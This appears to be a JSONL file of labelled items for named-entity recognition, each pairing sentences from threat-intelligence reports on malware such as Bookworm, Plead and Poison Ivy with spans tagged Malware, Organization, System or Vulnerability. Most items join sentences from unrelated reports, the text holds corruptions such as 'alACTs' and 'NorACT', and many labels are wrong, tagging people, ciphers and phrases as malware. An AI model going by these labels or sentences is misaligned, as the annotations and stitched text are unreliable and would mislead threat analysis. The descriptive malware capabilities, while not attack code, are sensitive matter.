{"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . XBOW 's capabilities are derived from BIFROSE and KIVARS ; Shrouded Crossbow gets its name from its unique mutex format .", "spans": [{"start": 89, "end": 97, "label": "Malware"}, {"start": 102, "end": 109, "label": "Malware"}, {"start": 137, "end": 147, "label": "Malware"}, {"start": 152, "end": 159, "label": "Malware"}, {"start": 199, "end": 203, "label": "Malware"}, {"start": 237, "end": 244, "label": "Malware"}, {"start": 249, "end": 255, "label": "Malware"}]}
{"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . While PLEAD and KIVARS are most likely to be used in first phase attacks , Waterbear can be seen as a secondary backdoor installed after attackers have gained a certain level of privilege .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 33, "end": 63, "label": "Vulnerability"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 120, "end": 132, "label": "Malware"}, {"start": 165, "end": 170, "label": "Malware"}, {"start": 175, "end": 181, "label": "Malware"}]}
{"text": "Both groups can set permissions on specific files to Everyone , and work in tandem with the PLATINUM backdoors . Recently , the JPCERT published a thorough analysis of the Plead backdoor , which , according to Trend Micro , is used by the cyberespionage group BlackTech .", "spans": [{"start": 5, "end": 11, "label": "Organization"}, {"start": 16, "end": 31, "label": "Malware"}, {"start": 92, "end": 110, "label": "System"}, {"start": 128, "end": 134, "label": "Organization"}, {"start": 172, "end": 186, "label": "Malware"}, {"start": 210, "end": 221, "label": "Organization"}]}
{"text": "At a high level , hot patching can transparently apply patches to executables and DLLs in actively running processes , which does not happen with traditional methods of code injection such as CreateRemoteThread or WriteProcessMemory . Despite the fact that the Changing Information Technology Inc. certificate was revoked on July 4 , 2017 , the BlackTech group is still using it to sign their malicious tools .", "spans": [{"start": 49, "end": 62, "label": "Malware"}, {"start": 192, "end": 210, "label": "Malware"}, {"start": 214, "end": 232, "label": "Malware"}]}
{"text": "Hot patching is an operating system-supported feature for installing updates without having to reboot or restart a process . The BlackTech group is primarily focused on cyberespionage in Asia .", "spans": [{"start": 19, "end": 53, "label": "System"}, {"start": 58, "end": 76, "label": "Malware"}]}
{"text": "Until this incident , no malware had been discovered misusing the AMT SOL feature for communication . The new activity described in this blogpost was detected by ESET in Taiwan , where the Plead malware has alACTs been most actively deployed .", "spans": [{"start": 86, "end": 99, "label": "Malware"}, {"start": 162, "end": 166, "label": "Organization"}, {"start": 189, "end": 194, "label": "Malware"}, {"start": 195, "end": 202, "label": "Malware"}]}
{"text": "The folders seem to contain information about the company 's development documentation , artificial intelligence model , web security software , and antivirus software base code . Attackers are targeting Windows platform and aiming at government institutions as well as big companies in Colombia .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 20, "end": 39, "label": "Malware"}, {"start": 204, "end": 211, "label": "System"}, {"start": 235, "end": 258, "label": "Organization"}]}
{"text": "As mentioned in the Hermes to Ryuk section , Ryuk uses a combination of symmetric ( AES ) and asymmetric ( RSA ) encryption to encrypt files . Attackers like to use spear-fishing email with password protected RAR attachment to avoid being detected by the email gateACT .", "spans": [{"start": 20, "end": 26, "label": "System"}, {"start": 30, "end": 34, "label": "System"}, {"start": 45, "end": 49, "label": "System"}, {"start": 84, "end": 87, "label": "System"}, {"start": 107, "end": 110, "label": "System"}, {"start": 127, "end": 140, "label": "Malware"}, {"start": 209, "end": 212, "label": "Malware"}]}
{"text": "Their software , once surreptitiously installed on a target 's cell phone or computer , can be used to monitor the target 's communications , such as phone calls , text messages , Skype calls , or emails . The first sample being captured was in April 2018 and since that we observed a lot more related ones .", "spans": [{"start": 103, "end": 139, "label": "Malware"}]}
{"text": "This isn\u2019t a bad thing as it shows a natural grouping of nodes that could be a good candidate to group to help simplify the overall graph and make analysis easier . After performing investigations on the classified victims , we find the attacker targets big companies and government agencies in Colombia .", "spans": [{"start": 26, "end": 28, "label": "Malware"}, {"start": 111, "end": 137, "label": "Malware"}, {"start": 142, "end": 162, "label": "Malware"}, {"start": 272, "end": 291, "label": "Organization"}]}
{"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . After monitoring and correlating the APT attack , 360 Threat Intelligence Center discovered multiple related emails to attack Colombian government agencies , financial institutions and large enterprises .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 62, "end": 81, "label": "Malware"}, {"start": 155, "end": 185, "label": "Organization"}, {"start": 214, "end": 220, "label": "System"}, {"start": 241, "end": 260, "label": "Organization"}, {"start": 263, "end": 285, "label": "Organization"}, {"start": 296, "end": 307, "label": "Organization"}]}
{"text": "The GoogleUpdate.exe component is responsible for communicating with the remote C&C server . The oldest sample we've seen up to now is from November 2013 .", "spans": [{"start": 4, "end": 20, "label": "Malware"}, {"start": 50, "end": 63, "label": "Malware"}]}
{"text": "This way , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . One of the top targets is the Japan Pension Service , but the list of targeted industries includes government and government agencies , local governments , public interest groups , universities , banks , financial services , energy and so on .", "spans": [{"start": 15, "end": 22, "label": "Malware"}, {"start": 36, "end": 49, "label": "Malware"}, {"start": 112, "end": 120, "label": "Malware"}, {"start": 125, "end": 132, "label": "Malware"}, {"start": 186, "end": 201, "label": "Organization"}, {"start": 249, "end": 259, "label": "Organization"}, {"start": 264, "end": 283, "label": "Organization"}, {"start": 286, "end": 303, "label": "Organization"}, {"start": 306, "end": 328, "label": "Organization"}, {"start": 331, "end": 343, "label": "Organization"}, {"start": 346, "end": 351, "label": "Organization"}, {"start": 354, "end": 372, "label": "Organization"}, {"start": 375, "end": 381, "label": "Organization"}]}
{"text": "They also download apks secretly and record audios and videos , then upload users\u2019 privacy information to server , causing users\u2019 privacy leakage . However , the attack is different in two respects : unlike other APTs , the main focus of Blue Termite is to attack Japanese organizations ; and most of their C2s are located in Japan .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 10, "end": 18, "label": "Malware"}, {"start": 24, "end": 32, "label": "Malware"}, {"start": 37, "end": 50, "label": "Malware"}, {"start": 69, "end": 75, "label": "Malware"}, {"start": 238, "end": 250, "label": "Malware"}]}
{"text": "The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached , and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system . Originally , the main infection vector of Blue Termite was spear-phishing emails .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 106, "end": 120, "label": "Malware"}, {"start": 121, "end": 130, "label": "Malware"}, {"start": 188, "end": 196, "label": "Organization"}, {"start": 303, "end": 315, "label": "Malware"}, {"start": 335, "end": 341, "label": "System"}]}
{"text": "The email stealer collects connection protocol information and account information , such as SMTP , IMAP , and POP3 , which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format . Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) .", "spans": [{"start": 4, "end": 17, "label": "Malware"}, {"start": 18, "end": 37, "label": "Malware"}, {"start": 252, "end": 265, "label": "Organization"}, {"start": 348, "end": 353, "label": "System"}, {"start": 354, "end": 361, "label": "Vulnerability"}, {"start": 364, "end": 377, "label": "Vulnerability"}]}
{"text": "The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer . Kaspersky Lab also found some watering hole attacks , including one on a website belonging to a prominent member of the Japanese government .", "spans": [{"start": 4, "end": 23, "label": "Malware"}, {"start": 96, "end": 103, "label": "Malware"}, {"start": 129, "end": 142, "label": "Organization"}]}
{"text": "The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine . In early July 2015 , however , Kaspersky Lab found a sample that creates a decryption key with Salt1 , Salt2 , and Salt3 .", "spans": [{"start": 17, "end": 35, "label": "Malware"}, {"start": 42, "end": 49, "label": "Malware"}, {"start": 136, "end": 149, "label": "Organization"}]}
{"text": "Silence.MainModule is a typical remote control Trojan that provides access to the command shell CMD.EXE with the possibility of downloading files from remote nodes to a computer and uploading files from a computer to a remote server . From early June , when the cyber-attack on the Japan Pension Service started to be reported widely , various Japanese organizations would have started to deploy protection measures .", "spans": [{"start": 0, "end": 18, "label": "Malware"}, {"start": 59, "end": 67, "label": "Malware"}, {"start": 96, "end": 103, "label": "Malware"}, {"start": 128, "end": 145, "label": "Malware"}, {"start": 182, "end": 197, "label": "Malware"}, {"start": 288, "end": 303, "label": "Organization"}]}
{"text": "PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more . It employs AES in addition to SID tricks , making it difficult to decrypt sensitive data .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 90, "end": 115, "label": "Malware"}, {"start": 120, "end": 130, "label": "Malware"}, {"start": 133, "end": 152, "label": "Malware"}, {"start": 155, "end": 172, "label": "Malware"}, {"start": 175, "end": 198, "label": "Malware"}, {"start": 221, "end": 224, "label": "Malware"}, {"start": 240, "end": 243, "label": "Malware"}]}
{"text": "TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution . In order to fight back against this cyber-espionage , Kaspersky Lab will continue its research .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 18, "end": 47, "label": "Malware"}, {"start": 50, "end": 59, "label": "Malware"}, {"start": 64, "end": 75, "label": "Malware"}, {"start": 91, "end": 100, "label": "Malware"}, {"start": 181, "end": 194, "label": "Organization"}]}
{"text": "PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file . Bookworm 's functional code is radically different from PlugX and has a rather unique modular architecture that warranted additional analysis by Unit 42 .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 43, "end": 48, "label": "Malware"}, {"start": 144, "end": 152, "label": "Malware"}, {"start": 200, "end": 205, "label": "Malware"}, {"start": 289, "end": 296, "label": "Organization"}]}
{"text": "The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation . Bookworm has little malicious functionality built-in , with its only core ability involving stealing keystrokes and clipboard contents .", "spans": [{"start": 35, "end": 42, "label": "Malware"}, {"start": 149, "end": 159, "label": "Malware"}, {"start": 202, "end": 210, "label": "Malware"}]}
{"text": "The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less\u201d aspect of this method . The Plead malware is a backdoor which , according to Trend Micro , is used by the BlackTech group in targeted attacks .", "spans": [{"start": 8, "end": 15, "label": "Malware"}, {"start": 27, "end": 34, "label": "Malware"}, {"start": 129, "end": 134, "label": "Malware"}, {"start": 135, "end": 142, "label": "Malware"}, {"start": 148, "end": 156, "label": "Malware"}, {"start": 178, "end": 189, "label": "Organization"}]}
{"text": "In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc , and can act as a keylogger . So far , it appears threat actors have deployed the Bookworm Trojan primarily in attacks on targets in Thailand .", "spans": [{"start": 10, "end": 18, "label": "Malware"}, {"start": 53, "end": 61, "label": "Malware"}, {"start": 173, "end": 176, "label": "Malware"}, {"start": 246, "end": 261, "label": "Malware"}]}
{"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . The threat actors use a commercial installation tool called Smart Installer Maker to encapsulate and execute a self-extracting RAR archive and in some cases a decoy slideshow or Flash installation application .", "spans": [{"start": 12, "end": 21, "label": "Malware"}, {"start": 32, "end": 45, "label": "Vulnerability"}, {"start": 49, "end": 68, "label": "Malware"}, {"start": 131, "end": 152, "label": "Malware"}, {"start": 182, "end": 201, "label": "Malware"}, {"start": 230, "end": 245, "label": "Malware"}, {"start": 249, "end": 279, "label": "Malware"}]}
{"text": "The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . The self-extracting RAR writes a legitimate executable , an actor-created DLL called Loader.dll and a file named readme.txt to the filesystem and then executes the legitimate executable .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 22, "end": 30, "label": "Malware"}, {"start": 40, "end": 54, "label": "System"}, {"start": 72, "end": 81, "label": "Organization"}, {"start": 174, "end": 193, "label": "Malware"}, {"start": 244, "end": 247, "label": "System"}, {"start": 255, "end": 265, "label": "Indicator"}, {"start": 283, "end": 293, "label": "Indicator"}]}
{"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . targeted attacks .", "spans": [{"start": 12, "end": 21, "label": "Malware"}, {"start": 32, "end": 45, "label": "Vulnerability"}, {"start": 49, "end": 68, "label": "Malware"}]}
{"text": "The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets . Using XREFs during static analysis is a common technique to quickly find where functions of interest are called .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 43, "end": 48, "label": "Organization"}, {"start": 52, "end": 71, "label": "Malware"}, {"start": 106, "end": 116, "label": "System"}, {"start": 220, "end": 225, "label": "Malware"}]}
{"text": "The batch script would then attempt to have the VNC program connect to a command and control ( C2 ) server to enable the server to control the compromised system . The developers designed Bookworm to be a modular Trojan not limited to just the initial architecture of the Trojan , as Bookworm can also load additional modules provided by the C2 server .", "spans": [{"start": 48, "end": 51, "label": "System"}, {"start": 60, "end": 92, "label": "Malware"}, {"start": 188, "end": 196, "label": "Malware"}, {"start": 205, "end": 219, "label": "Malware"}, {"start": 272, "end": 278, "label": "Malware"}, {"start": 284, "end": 292, "label": "Malware"}, {"start": 342, "end": 344, "label": "System"}]}
{"text": "The IndiaBravo-PapaAlfa installer is responsible for installing the service DLL variant . Although the developers of Bookworm have included only keylogging functionality in Bookworm as a core ability , as suggested in Table 1 , several of the embedded DLLs provide Leader with cryptographic and hashing functions , while others support Leader 's ability to communicate with its C2 server .", "spans": [{"start": 4, "end": 33, "label": "System"}, {"start": 53, "end": 87, "label": "Malware"}, {"start": 117, "end": 125, "label": "Malware"}, {"start": 173, "end": 181, "label": "Malware"}, {"start": 336, "end": 342, "label": "Malware"}, {"start": 378, "end": 380, "label": "System"}]}
{"text": "These tools often lay the groundwork for further malicious activity , such as the targeting of antivirus capabilities and the disabling of firewalls , both of which are very fundamental defensive measures . While we did not discuss the surrounding attacks using Bookworm in detail , we have observed threat actors deploying Bookworm primarily in attacks on targets in Thailand .", "spans": [{"start": 82, "end": 117, "label": "Malware"}, {"start": 126, "end": 148, "label": "Malware"}, {"start": 262, "end": 270, "label": "Malware"}, {"start": 324, "end": 332, "label": "Malware"}]}
{"text": "The first class , colloquially known as \" wipers \" , are a class of malware has the primary intent of destroying data on a victim 's machine . Also , Bookworm uses a combination of encryption and compression algorithms to obfuscate the traffic between the system and C2 server .", "spans": [{"start": 42, "end": 48, "label": "System"}, {"start": 102, "end": 117, "label": "Malware"}, {"start": 150, "end": 158, "label": "Malware"}, {"start": 267, "end": 269, "label": "System"}]}
{"text": "DDoS malware floods a target 's network-connected service with an excessive number of request at once in order to overload the capacity of the server . The developers of Bookworm have gone to great lengths to create a modular framework that is very flexible through its ability to run additional modules directly from its C2 server .", "spans": [{"start": 0, "end": 12, "label": "System"}, {"start": 114, "end": 135, "label": "Malware"}, {"start": 170, "end": 178, "label": "Malware"}, {"start": 322, "end": 324, "label": "System"}]}
{"text": "The naming scheme used by Novetta for the malware identified during Operation Blockbuster consists of at least two identifiers which each identifier coming from the International Civil Aviation Organization ( ICAO ) 's phonetic alphabet ,2 commonly referred to as the NATO phonetic alphabet . Unit 42 recently published a blog on a newly identified Trojan called Bookworm , which discussed the architecture and capabilities of the malware and alluded to Thailand being the focus of the threat actors' campaigns .", "spans": [{"start": 4, "end": 10, "label": "Malware"}, {"start": 26, "end": 33, "label": "Organization"}, {"start": 165, "end": 206, "label": "Organization"}, {"start": 293, "end": 300, "label": "Organization"}, {"start": 349, "end": 355, "label": "Malware"}, {"start": 363, "end": 371, "label": "Malware"}]}
{"text": "Loaders are typically responsible for loading a DLL component into memory given that a DLL cannot operate in a standalone mode such as an executable . Leader is Bookworm 's main module and controls all of the activities of the Trojan , but relies on the additional DLLs to provide specific functionality .", "spans": [{"start": 38, "end": 73, "label": "Malware"}, {"start": 151, "end": 157, "label": "Malware"}, {"start": 161, "end": 169, "label": "Malware"}, {"start": 227, "end": 233, "label": "Malware"}, {"start": 265, "end": 269, "label": "Indicator"}]}
{"text": "This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans . The developers of Bookworm use these modules in a rather unique ACT , as the other embedded DLLs provide API functions for Leader to carry out its tasks .", "spans": [{"start": 29, "end": 40, "label": "Malware"}, {"start": 138, "end": 146, "label": "Malware"}, {"start": 243, "end": 249, "label": "Malware"}]}
{"text": "FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors . Unit 42 does not have detailed targeting information for all known Bookworm samples , but we are aware of attempted attacks on at least two branches of government in Thailand .", "spans": [{"start": 0, "end": 9, "label": "System"}, {"start": 20, "end": 36, "label": "Malware"}, {"start": 64, "end": 84, "label": "System"}, {"start": 165, "end": 184, "label": "Organization"}, {"start": 187, "end": 194, "label": "Organization"}, {"start": 254, "end": 270, "label": "Malware"}, {"start": 339, "end": 349, "label": "Organization"}]}
{"text": "As a backdoor Trojan , Volgmer has several capabilities including : gathering system information , updating service registry keys , downloading and uploading files , executing commands , terminating processes , and listing directories . We speculate that other attacks delivering Bookworm were also targeting organizations in Thailand based on the contents of the associated decoys documents , as well as several of the dynamic DNS domain names used to host C2 servers that contain the words \" Thai \" or \" Thailand \" .", "spans": [{"start": 5, "end": 20, "label": "System"}, {"start": 23, "end": 30, "label": "System"}, {"start": 68, "end": 96, "label": "Malware"}, {"start": 99, "end": 129, "label": "Malware"}, {"start": 132, "end": 143, "label": "Malware"}, {"start": 148, "end": 163, "label": "Malware"}, {"start": 166, "end": 184, "label": "Malware"}, {"start": 187, "end": 208, "label": "Malware"}, {"start": 215, "end": 234, "label": "Malware"}, {"start": 280, "end": 288, "label": "Malware"}, {"start": 375, "end": 391, "label": "Indicator"}, {"start": 420, "end": 438, "label": "Malware"}, {"start": 458, "end": 460, "label": "System"}]}
{"text": "RATANKBA is delivered to its victims using a variety of lure documents , including Microsoft Office documents , malicious CHM files , and different script downloaders . We believe that it is likely threat actors will continue development Bookworm , and will continue to use it for the foreseeable future .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 37, "end": 70, "label": "Malware"}, {"start": 83, "end": 109, "label": "System"}, {"start": 122, "end": 131, "label": "System"}, {"start": 238, "end": 246, "label": "Malware"}]}
{"text": "These files have the capability to download and install malware , install proxy and Remote Access Trojans ( RATs ) , connect to command and control ( C2 ) servers to receive additional instructions , and modify the victim 's firewall to allow incoming connections . Threat actors have delivered Bookworm as a payload in attacks on targets in Thailand .", "spans": [{"start": 35, "end": 43, "label": "Malware"}, {"start": 48, "end": 63, "label": "Malware"}, {"start": 66, "end": 79, "label": "Malware"}, {"start": 84, "end": 105, "label": "Malware"}, {"start": 108, "end": 112, "label": "System"}, {"start": 117, "end": 147, "label": "Malware"}, {"start": 166, "end": 197, "label": "Malware"}, {"start": 204, "end": 233, "label": "Malware"}, {"start": 295, "end": 303, "label": "Malware"}]}
{"text": "The WannaCry malware consists of two distinct components , one that provides ransomware functionality and a component used for propagation , which contains functionality to enable SMB exploitation capabilities . Analysis of compromised systems seen communicating with Bookworm C2 servers also confirms our speculation on targeting with a majority of systems existing within Thailand .", "spans": [{"start": 4, "end": 20, "label": "System"}, {"start": 68, "end": 101, "label": "Malware"}, {"start": 127, "end": 138, "label": "Malware"}, {"start": 180, "end": 183, "label": "System"}, {"start": 268, "end": 287, "label": "Malware"}]}
{"text": "WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data . As mentioned in our previous blog on Bookworm , the Trojan sends a static date string to the C2 server that we referred to as a campaign code .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 47, "end": 52, "label": "Malware"}, {"start": 65, "end": 100, "label": "Malware"}, {"start": 207, "end": 215, "label": "Malware"}, {"start": 222, "end": 228, "label": "Malware"}, {"start": 263, "end": 265, "label": "System"}]}
{"text": "WCry uses a combination of the RSA and AES algorithms to encrypt files . We believed that the actors would use this date code to track their attack campaigns ; however , after continued analysis of the malware , we think these static dates could also be a build identifier for the Trojan .", "spans": [{"start": 0, "end": 4, "label": "System"}, {"start": 31, "end": 34, "label": "System"}, {"start": 39, "end": 42, "label": "System"}, {"start": 57, "end": 70, "label": "Malware"}, {"start": 116, "end": 125, "label": "Malware"}, {"start": 281, "end": 287, "label": "Malware"}]}
{"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier .", "spans": [{"start": 12, "end": 21, "label": "Malware"}, {"start": 32, "end": 45, "label": "Vulnerability"}, {"start": 49, "end": 68, "label": "Malware"}, {"start": 97, "end": 118, "label": "Indicator"}, {"start": 129, "end": 144, "label": "Malware"}]}
{"text": "Depending on placement , a web shell can provide continued access to victims ' environments , re-infect victim systems , and facilitate lateral movement . A Trojan sending a build identifier to its C2 server is quite common , as it notifies the threat actors of the specific version of the Trojan in which they are interacting .", "spans": [{"start": 41, "end": 65, "label": "Malware"}, {"start": 94, "end": 118, "label": "Malware"}, {"start": 125, "end": 152, "label": "Malware"}, {"start": 157, "end": 163, "label": "Malware"}, {"start": 198, "end": 200, "label": "System"}, {"start": 290, "end": 296, "label": "Malware"}]}
{"text": "While it lacks more advanced functionality like screen capturing , it is still able to carry out most tasks desired by threat actors : exfiltration of files , ability to download and execute additional payloads , and gain remote shell access . Due to these changes without a new date string , we believe the date codes are used for campaign tracking rather than a Bookworm build identifier .", "spans": [{"start": 119, "end": 132, "label": "Organization"}, {"start": 135, "end": 156, "label": "Malware"}, {"start": 170, "end": 178, "label": "Malware"}, {"start": 183, "end": 210, "label": "Malware"}, {"start": 217, "end": 241, "label": "Malware"}, {"start": 279, "end": 290, "label": "Indicator"}, {"start": 308, "end": 318, "label": "Indicator"}, {"start": 364, "end": 372, "label": "Malware"}]}
{"text": "To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys . We believe that Bookworm samples use the static date string as campaign codes , which we used to determine the approximate date of each attack that we did not have detailed targeting information .", "spans": [{"start": 54, "end": 68, "label": "Malware"}, {"start": 127, "end": 156, "label": "Malware"}, {"start": 175, "end": 191, "label": "Malware"}]}
{"text": "For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer . Another decoy slideshow associated with the Bookworm attack campaign contains photos of an event called Bike for Dad 2015 .", "spans": [{"start": 28, "end": 41, "label": "System"}, {"start": 125, "end": 148, "label": "Malware"}, {"start": 179, "end": 202, "label": "Malware"}, {"start": 227, "end": 249, "label": "System"}, {"start": 260, "end": 275, "label": "Indicator"}]}
{"text": "DROPSHOT is a notable piece of malware used to deliver variants of the TURNEDUP backdoor . The campaign code \" 20150920 \" is associated with this decoy , which is a week prior to media articles announcing that the Crown Price of Thailand Maha Vajiralongkorn will lead the Bike for Dad 2015 event .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 31, "end": 38, "label": "System"}, {"start": 47, "end": 88, "label": "Malware"}, {"start": 179, "end": 184, "label": "Organization"}]}
{"text": "The SHAPESHIFT wiper is capable of wiping disks and volumes , as well as deleting files . Chitpas is heavily involved with Thailand politics and was a core leader of the People 's Committee for Absolute Democracy ( PCAD ) , which is an organization that staged anti-government campaigns in 2013 and 2014 .", "spans": [{"start": 4, "end": 20, "label": "System"}, {"start": 35, "end": 59, "label": "Malware"}, {"start": 73, "end": 87, "label": "Malware"}, {"start": 132, "end": 140, "label": "Organization"}, {"start": 170, "end": 212, "label": "Organization"}, {"start": 215, "end": 219, "label": "Organization"}]}
{"text": "The HTA files contained job descriptions and links to job postings on popular employment websites . The final remaining known decoy includes photos of Chitpas Tant Kridakon ( Figure 7 ) , who is known as heiress to the largest brewery in Thailand .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 14, "end": 50, "label": "Malware"}, {"start": 126, "end": 131, "label": "Malware"}, {"start": 151, "end": 172, "label": "Malware"}]}
{"text": "The attacker used a spear-phishing email containing a link to a fake resume hosted on a legitimate website that had been compromised . These images were associated with the Bookworm campaign code \" 20150905 \" .", "spans": [{"start": 4, "end": 12, "label": "Organization"}, {"start": 41, "end": 58, "label": "Malware"}]}
{"text": "Further analysis revealed a well-established collection of fake social media profiles that appear intended to build trust and rapport with potential victims . Unit 42 analyzed the systems communicating with the Bookworm C2 domains and found that a majority of the IP addresses existed within autonomous systems located in Thailand .", "spans": [{"start": 64, "end": 76, "label": "Organization"}, {"start": 110, "end": 121, "label": "Malware"}, {"start": 126, "end": 156, "label": "Malware"}, {"start": 159, "end": 166, "label": "Organization"}, {"start": 211, "end": 219, "label": "Malware"}, {"start": 220, "end": 222, "label": "System"}, {"start": 264, "end": 266, "label": "Indicator"}]}
{"text": "The macro ran a PowerShell command that attempted to download additional PowerShell loader scripts for PupyRAT , a research and penetration-testing tool that has been used in attacks . The pie chart in Figure 8 shows that the vast majority ( 73% ) of the hosts are geographically located in Thailand , which matches the known targeting of this threat group .", "spans": [{"start": 16, "end": 34, "label": "System"}, {"start": 53, "end": 98, "label": "Malware"}, {"start": 103, "end": 110, "label": "System"}, {"start": 115, "end": 152, "label": "System"}]}
{"text": "ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints . We believe that the IP addresses from Canada , Russia and NorACT are analysis systems of antivirus companies or security researchers .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 46, "end": 63, "label": "Organization"}, {"start": 105, "end": 134, "label": "Malware"}, {"start": 235, "end": 237, "label": "Indicator"}, {"start": 304, "end": 323, "label": "Organization"}]}
{"text": "Poison Ivy is a remote access tool that is freely available for download from its official web site at www.poisonivy-rat.com . Overall , the Bookworm infrastructure overlaps with the infrastructure hosting C2 servers used by various attack tools , including FFRAT , Poison Ivy , PlugX , and others .", "spans": [{"start": 0, "end": 10, "label": "System"}, {"start": 16, "end": 29, "label": "Malware"}, {"start": 141, "end": 149, "label": "Malware"}, {"start": 206, "end": 208, "label": "System"}, {"start": 258, "end": 263, "label": "Malware"}, {"start": 266, "end": 276, "label": "Malware"}, {"start": 279, "end": 284, "label": "Malware"}]}
{"text": "Poison Ivy includes features common to most Windows-based RATs , including key logging , screen capturing , video capturing , file transfers , system administration , password theft , and traffic relaying . Overall , the Bookworm infrastructure overlaps with the infrastructure hosting C2 servers used by various attack tools , including FFRAT , Poison Ivy , PlugX , and others .", "spans": [{"start": 0, "end": 10, "label": "System"}, {"start": 58, "end": 62, "label": "System"}, {"start": 75, "end": 86, "label": "Malware"}, {"start": 89, "end": 105, "label": "Malware"}, {"start": 108, "end": 123, "label": "Malware"}, {"start": 126, "end": 140, "label": "Malware"}, {"start": 143, "end": 164, "label": "Malware"}, {"start": 167, "end": 181, "label": "Malware"}, {"start": 188, "end": 204, "label": "Malware"}, {"start": 221, "end": 229, "label": "Malware"}, {"start": 286, "end": 288, "label": "System"}, {"start": 338, "end": 343, "label": "Malware"}, {"start": 346, "end": 356, "label": "Malware"}, {"start": 359, "end": 364, "label": "Malware"}]}
{"text": "The Poison Ivy builder kit allows attackers to customize and build their own PIVY server , which is delivered as mobile code to a target that has been compromised , typically using social engineering . Unit 42 enumerated the threat infrastructure related to Bookworm and created a chart to visualize connected entities to its current attack campaign .", "spans": [{"start": 4, "end": 14, "label": "System"}, {"start": 34, "end": 43, "label": "Organization"}, {"start": 47, "end": 88, "label": "Malware"}, {"start": 181, "end": 199, "label": "Organization"}, {"start": 202, "end": 209, "label": "Organization"}, {"start": 258, "end": 266, "label": "Malware"}]}
{"text": "We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded . Threat actors have targeted the government of Thailand and delivered the newly discovered Bookworm Trojan since July 2015 .", "spans": [{"start": 29, "end": 46, "label": "System"}, {"start": 66, "end": 84, "label": "Malware"}, {"start": 93, "end": 105, "label": "System"}, {"start": 110, "end": 128, "label": "Malware"}, {"start": 131, "end": 154, "label": "Malware"}, {"start": 157, "end": 177, "label": "Malware"}, {"start": 188, "end": 235, "label": "Malware"}, {"start": 238, "end": 249, "label": "Malware"}, {"start": 338, "end": 348, "label": "Organization"}, {"start": 396, "end": 411, "label": "Malware"}]}
{"text": "Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload . The actors appear to follow a set playbook , as the observed TTPs are fairly static within each attack in this campaign .", "spans": [{"start": 60, "end": 83, "label": "Malware"}, {"start": 171, "end": 200, "label": "Malware"}]}
